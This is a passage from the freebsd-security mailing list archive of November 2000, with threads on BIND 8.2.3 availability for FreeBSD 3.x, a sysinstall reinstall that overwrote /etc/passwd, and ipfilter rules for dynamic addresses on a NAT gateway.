1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tue, 14 Nov 2000, Kris Kennaway wrote: ... : The upgrade will be committed shortly, I believe - it only applies to : 3.x, since 4.x has 8.2.3. Speaking of that, is there a reason I'm missing for 8.2.3 not being in the ports tree where 8.2.2 is? : Kris : * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE6EnONdMMtMcA1U5ARAvCcAJ91DvrIaYojj9fhQ8T+4uxzOG54HACfcsXy 6YnSX3WvS6hA40AAZMvkkFg= =NIw3 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 6: 2:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 008CD37B4C5; Wed, 15 Nov 2000 06:02:45 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA26677; Wed, 15 Nov 2000 06:02:33 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda26675; Wed Nov 15 06:02:15 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFE2AS04761; Wed, 15 Nov 2000 06:02:10 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdut4758; Wed Nov 15 06:01:18 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eAFE1Ij45017; Wed, 15 Nov 2000 06:01:18 -0800 (PST) Message-Id: <200011151401.eAFE1Ij45017@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdN44995; Wed Nov 15 06:00:34 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Matt Heckaman Cc: Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 06:29:16 EST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Nov 2000 06:00:33 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Mat t Heckaman writes: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Tue, 14 Nov 2000, Kris Kennaway wrote: > ... > : The upgrade will be committed shortly, I believe - it only applies to > : 3.x, since 4.x has 8.2.3. > > Speaking of that, is there a reason I'm missing for 8.2.3 not being in the > ports tree where 8.2.2 is? That's because 8.2.3 is in the base tree. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 7:13:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 78CBF37B4D7 for ; Wed, 15 Nov 2000 07:13:29 -0800 (PST) Received: (qmail 93814 invoked by uid 1000); 15 Nov 2000 15:13:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 15:13:28 -0000 Date: Wed, 15 Nov 2000 10:13:27 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Cy Schubert - ITSD Open Systems Group Cc: Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <200011151401.eAFE1Ij45017@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: ... : That's because 8.2.3 is in the base tree. Not for people who are not running 4.x * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE6EqgYdMMtMcA1U5ARAnMLAJ4jC79gTH+kOvINprasuOw4meVlKgCfekpg uDQl5UqoB//nm4VeNB/ehiA= =ul+l -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 7:28:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 3606537B4C5; Wed, 15 Nov 2000 07:28:40 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA27156; Wed, 15 Nov 2000 07:28:38 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda27154; Wed Nov 15 07:28:36 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFFSU005045; Wed, 15 Nov 2000 07:28:30 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdbT5043; Wed Nov 15 07:28:23 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eAFFSL152822; Wed, 15 Nov 2000 07:28:21 -0800 (PST) Message-Id: <200011151528.eAFFSL152822@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdR52620; Wed Nov 15 07:27:39 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Matt Heckaman Cc: Cy Schubert - ITSD Open Systems Group , Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 10:13:27 EST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Nov 2000 07:27:37 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Mat t Heckaman writes: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: > ... > : That's because 8.2.3 is in the base tree. > > Not for people who are not running 4.x You must be running an old version of 4.x. Bind 8.2.3-T5B was merged into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 7:58:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from axis.tdd.lt (axis.tdd.lt [193.219.211.5]) by hub.freebsd.org (Postfix) with ESMTP id 9D6E537B4CF for ; Wed, 15 Nov 2000 07:58:11 -0800 (PST) Received: from localhost (midom@localhost) by axis.tdd.lt (8.11.1/8.11.1) with ESMTP id eAFFvZP33540; Wed, 15 Nov 2000 17:57:35 +0200 (EET) Date: Wed, 15 Nov 2000 17:57:35 +0200 (EET) From: Domas Mituzas X-Sender: midom@axis.tdd.lt To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <200011151528.eAFFSL152822@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > Try to read that email again ;-) 8.2.3 in ports should be for guys using 3.x (and even 2.2.x ;-) -- Domas Mituzas Systems administrator DELFI, UAB, Lithuania To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 8:36:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0DFDB37B4C5 for ; Wed, 15 Nov 2000 08:36:36 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id IAA27320; Wed, 15 Nov 2000 08:36:20 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda27318; Wed Nov 15 08:36:04 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFGZxW56452; Wed, 15 Nov 2000 08:35:59 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdt56449; Wed Nov 15 08:35:21 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eAFGZLY29373; Wed, 15 Nov 2000 08:35:21 -0800 (PST) Message-Id: <200011151635.eAFGZLY29373@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdN29317; Wed Nov 15 08:34:34 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Domas Mituzas Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 17:57:35 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Nov 2000 08:34:34 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Domas Mituza s writes: > > You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > > into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > > > Try to read that email again ;-) 8.2.3 in ports should be for guys using > 3.x (and even 2.2.x ;-) I stand corrected. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 9:36:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 95CBC37B4CF for ; Wed, 15 Nov 2000 09:36:48 -0800 (PST) Received: (qmail 94193 invoked by uid 1000); 15 Nov 2000 17:36:47 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 17:36:47 -0000 Date: Wed, 15 Nov 2000 12:36:46 -0500 (EST) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Cy Schubert - ITSD Open Systems Group Cc: Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: <200011151528.eAFFSL152822@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: ... : You must be running an old version of 4.x. Bind 8.2.3-T5B was merged : into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. Not quite :) I have two machines on 4.1.1-RELEASE, which are new and were installed as 4.0 originally then upgraded to 4.1.1-RELEASE. The holdback server is 3.5-STABLE and I simply can't afford to take it down for an upgrade. I'm not comfortable doing a make world upgrade on 3.5 -> 4.x, mainly because of the mess it will probably be to clean out old binaries and so forth, and like I said, downtime on this machine is a huge no-no. The only way I'd ever consider it is to format and install 4.x clean, then dump the user info back from tape, but that would take too long.. :) * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE6EsmvdMMtMcA1U5ARAgOPAKC+XuIxgDjutB4HM1xBqABQpKCrEQCZAaUF vhtBk5W7djbbYdiAd+O8hgA= =L0xM -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 10:38:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 43B3037B4E5 for ; Wed, 15 Nov 2000 10:38:24 -0800 (PST) Received: (qmail 60875 invoked by uid 1000); 15 Nov 2000 18:38:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Nov 2000 18:38:23 -0000 Date: Wed, 15 Nov 2000 12:38:23 -0600 (CST) From: Mike Silbersack To: Matt Heckaman Cc: Cy Schubert - ITSD Open Systems Group , Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 15 Nov 2000, Matt Heckaman wrote: > On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: > ... > : You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > : into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > > Not quite :) > > I have two machines on 4.1.1-RELEASE, which are new and were installed as > 4.0 originally then upgraded to 4.1.1-RELEASE. The holdback server is > 3.5-STABLE and I simply can't afford to take it down for an upgrade. I'm > not comfortable doing a make world upgrade on 3.5 -> 4.x, mainly because > of the mess it will probably be to clean out old binaries and so forth, > and like I said, downtime on this machine is a huge no-no. The only way > I'd ever consider it is to format and install 4.x clean, then dump the > user info back from tape, but that would take too long.. :) > > * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * > * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * Well, as I recall, BIND builds pretty easily on FreeBSD. You could always manually build 8.2.3-T6B if you need it. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 10:43:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 454C037B479 for ; Wed, 15 Nov 2000 10:43:12 -0800 (PST) Received: (qmail 39481 invoked by uid 1001); 15 Nov 2000 18:43:10 +0000 (GMT) To: silby@silby.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) From: sthaug@nethelp.no In-Reply-To: Your message of "Wed, 15 Nov 2000 12:38:23 -0600 (CST)" References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 15 Nov 2000 19:43:09 +0100 Message-ID: <39479.974313789@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Well, as I recall, BIND builds pretty easily on FreeBSD. You could always > manually build 8.2.3-T6B if you need it. Extremely easy. As in "make clean; make depend; make". Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 10:54:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2062337B4C5; Wed, 15 Nov 2000 10:54:24 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA27785; Wed, 15 Nov 2000 10:54:23 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda27783; Wed Nov 15 10:54:20 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eAFIsE012778; Wed, 15 Nov 2000 10:54:14 -0800 (PST) Message-Id: <200011151854.eAFIsE012778@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdC12498; Wed Nov 15 10:53:17 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cschuber To: Mike Silbersack Cc: Matt Heckaman , Cy Schubert - ITSD Open Systems Group , Kris Kennaway , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) In-reply-to: Your message of "Wed, 15 Nov 2000 12:38:23 CST." Date: Wed, 15 Nov 2000 10:53:16 -0800 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Mike Silbersack writes: > > On Wed, 15 Nov 2000, Matt Heckaman wrote: > > > On Wed, 15 Nov 2000, Cy Schubert - ITSD Open Systems Group wrote: > > ... > > : You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > > : into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > > > > Not quite :) > > > > I have two machines on 4.1.1-RELEASE, which are new and were installed as > > 4.0 originally then upgraded to 4.1.1-RELEASE. The holdback server is > > 3.5-STABLE and I simply can't afford to take it down for an upgrade. I'm > > not comfortable doing a make world upgrade on 3.5 -> 4.x, mainly because > > of the mess it will probably be to clean out old binaries and so forth, > > and like I said, downtime on this machine is a huge no-no. The only way > > I'd ever consider it is to format and install 4.x clean, then dump the > > user info back from tape, but that would take too long.. :) > > Well, as I recall, BIND builds pretty easily on FreeBSD. You could always > manually build 8.2.3-T6B if you need it. Or, creating a local port from the bind8 port in /usr/ports is simple. Just update Makefile, distinfo, and if the patches don't apply, spend 1/2 hour fixing them up so they do. Then do a diff -urPN and submit the patchs as a PR. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 11:34: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id D333E37B4D7 for ; Wed, 15 Nov 2000 11:33:58 -0800 (PST) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id NAA25955; Wed, 15 Nov 2000 13:32:52 -0600 (CST) (envelope-from jeff-ml@mountin.net) Received: from dial-110.max1.wa.cyberlynk.net(207.227.118.110) by peak.mountin.net via smap (V1.3) id sma025953; Wed Nov 15 13:32:29 2000 Message-Id: <4.3.2.20001115132537.00aa5890@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Wed, 15 Nov 2000 13:31:56 -0600 To: Domas Mituzas , Cy Schubert - ITSD Open Systems Group From: "Jeffrey J. Mountin" Subject: Re: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <200011151528.eAFFSL152822@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:57 PM 11/15/00 +0200, Domas Mituzas wrote: > > You must be running an old version of 4.x. Bind 8.2.3-T5B was merged > > into -stable on Jul 3, 2000 and 8.2.3-T6B as MFCed on Nov 2. > > >Try to read that email again ;-) 8.2.3 in ports should be for guys using >3.x (and even 2.2.x ;-) Ah but 2.2.x has not been supported by ports for a while and 3.x support is fuzzy. Not to start another debate on what ports *should* support (check the archives, as it has been hashed over again and again), but sticking with only current (5.0) and stable (4.x) makes life easier on the port maintainers. Thus with 8.2.3 in the base for these branches there will not be a port. Unless you can convince them to. ;) Besides, it has been pointed out that it builds easily out-of-the-box. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 11:54:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id F0CF037B479 for ; Wed, 15 Nov 2000 11:54:40 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 4CDE76A92B for ; Wed, 15 Nov 2000 14:54:39 -0500 (EST) Message-ID: <003f01c04f3e$3c77e170$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: References: Subject: problem using sysinstall Date: Wed, 15 Nov 2000 14:57:08 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've received strange results after using sysinstall on 4.1.1-RELEASE FreeBSD. On preinstalled system I start /stand/sysinstall From the menu I select "Configure" -> "Distributions" . I select only bin from the distributions and start install from the primary ftp server. Everything ware fine except that that I started the installation remotely (thru firewall) and at some point after the transfer finished my ssh connection timeout and I loosed the connection with the server. I assume that the bin (re) installation finished fine. An hour later I went in the server room where box is and I try to login like root. For my surprise the system didn't prompt mi with a password but give me the root command prompt?! This off cource was not all. When I look at the /etc/password it ware completely new one! The root was without password, the root alias toor was with * for a password and without a shell! All other users accounts ware missing! I put a password for root and toor and try to login like toor. The result was that I received the root command prompt even if the account was without a shell in /etc/passwd?! The shell that I received was /bin/sh. My question is : is it normal to achieve such a results after this action? Is the sysinstall behavior correct? Why there ware no warnings about changes in /etc/passwd? Is it normal the behavior on toor alias? I believe the answer on all this questions is NO! I that is true then what wrong have I did? My sysinstall options are: Options Editor Name Value Name Value ---- ----- ---- ----- NFS Secure NO Media Timeout 300 NFS Slow NO Package Temp /usr/tmp Debugging NO Newfs Args -b 8192 -f 1024 No Warnings NO Config save YES Yes to All NO Re-scan Devices <*> DHCP NO Use Defaults [RESET!] FTP username ftp Editor /usr/bin/ee Tape Blocksize 20 Extract Detail high Release Name 4.1.1-RELEASE Install Root / Browser package lynx Browser Exec /usr/local/bin/lynx Media Type Use SPACE to select/toggle an option, arrow keys to move, ? or F1 for more help. When you're done, type Q to Quit. Please send copy to my e-mail address since I'm not on the list. Regards, Rossen Raykov To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 12:22:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id E9D8737B4E5 for ; Wed, 15 Nov 2000 12:22:08 -0800 (PST) Received: (qmail 28360 invoked by uid 0); 15 Nov 2000 20:16:05 -0000 Received: from p3ee20a99.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.153) by mail.gmx.net (mail04) with SMTP; 15 Nov 2000 20:16:05 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA02442 for freebsd-security@FreeBSD.ORG; Wed, 15 Nov 2000 19:22:59 +0100 Date: Wed, 15 Nov 2000 19:22:59 +0100 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001115192259.Q27042@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001114211934.B888@grok>; from sreid@sea-to-sky.net on Tue, Nov 14, 2000 at 09:19:34PM -0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Nov 14, 2000 at 21:19 -0800, Steve Reid wrote: > On Wed, Nov 15, 2000 at 12:05:28AM -0000, Nuno Teixeira wrote: > > > > [ ... dynamic IP ... ] > > This is what I've whipped up for my ipfilter config: > > http://sea-to-sky.net/~sreid/ipfinit > A simple little sh script that takes an interface name (fxp0 in > my case, tun0 in yours) as an argument and extracts the IP > address information from ifconfig, then performs the > appropriate substitutions on ipf.cfg and feeds the results to > ipf. I haven't looked at your doc (yet), but I suddenly felt like replying. :) ipf already has a feature like ppp's MYADDR -- specify 0.0.0.0/32 as the IP and issue "ipf -y" when interface configuration changes (like in ppp.linkup or in the appropriate dhcp client hooks). And BTW: You do bind your rules to interfaces ("... on $IF") already, don't you? If not, I wouldn't like to ignore where certain packets come in from or want to leave the machine at ... If it's just for variable substitution or conditional "compilation", you might find my patch described in http://www.freebsd.org/cgi/query-pr.cgi?pr=21989 of interest. > To use the above, add "options IPFILTER" to your kernel config. And one better adds IPFILTER_LOG as well as IPFILTER_DEFAULT_BLOCK to the kernel config before getting used to live without it. :) And since JKH was so kind to MFC the PR 20202 patch, ipf would even come up at boot time beginning with the 4.2-RELEASE if the admin wants it to. There's nothing more to it than throwing a little lever in rc.conf (a real life example is given in "man 5 rc.conf"). virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 15 12:50:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id AA33337B479 for ; Wed, 15 Nov 2000 12:50:39 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAFKpnc21358; Wed, 15 Nov 2000 12:51:49 -0800 (PST) (envelope-from kris) Date: Wed, 15 Nov 2000 12:51:48 -0800 From: Kris Kennaway To: Rossen Raykov Cc: security@FreeBSD.ORG Subject: Re: problem using sysinstall Message-ID: <20001115125148.A21232@citusc17.usc.edu> References: <003f01c04f3e$3c77e170$4c00000a@sage> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="d6Gm4EdcadzBjdND" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: 